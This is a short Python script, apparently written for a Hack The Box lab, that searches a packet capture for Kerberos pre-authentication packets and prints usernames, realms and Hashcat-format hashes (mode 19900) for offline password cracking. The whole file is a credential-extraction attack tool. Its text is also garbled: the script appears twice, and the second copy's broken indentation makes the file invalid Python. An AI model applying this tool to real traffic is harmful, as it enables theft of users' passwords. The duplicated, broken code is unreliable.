Reelix/find-kerb.py

## find-kerb.py
import socket
import pyshark
from pprint import pprint

data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos")
print("Searching for Kerberos packets...")
for pkt in data:
	if "Kerberos" in pkt:
		dirs = dir(pkt["Kerberos"])
		if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs):
			name = pkt['Kerberos'].CNameString
			realm = pkt['Kerberos'].realm
			hash = pkt['Kerberos'].cipher.replace(':', '')
			kerbtype = pkt['Kerberos'].etype
			print("Username: " + name)
			print("Realm: " + realm)
			if (kerbtype == "18"):
				print("Hashcat Hash: $krb5pa$18$" + name + "$" + realm + "$" + hash)
				print("Hashcat Mode: 19900")
			else:
				print("Unknown Hash Type - Alter the script")
	import socket
	import pyshark
	from pprint import pprint

	data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos")
	print("Searching for Kerberos packets...")
	for pkt in data:
	if "Kerberos" in pkt:
	dirs = dir(pkt["Kerberos"])
	if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs):
	name = pkt['Kerberos'].CNameString
	realm = pkt['Kerberos'].realm
	hash = pkt['Kerberos'].cipher.replace(':', '')
	kerbtype = pkt['Kerberos'].etype
	print("Username: " + name)
	print("Realm: " + realm)
	if (kerbtype == "18"):
	print("Hashcat Hash: $krb5pa$18$" + name + "$" + realm + "$" + hash)
	print("Hashcat Mode: 19900")
	else:
	print("Unknown Hash Type - Alter the script")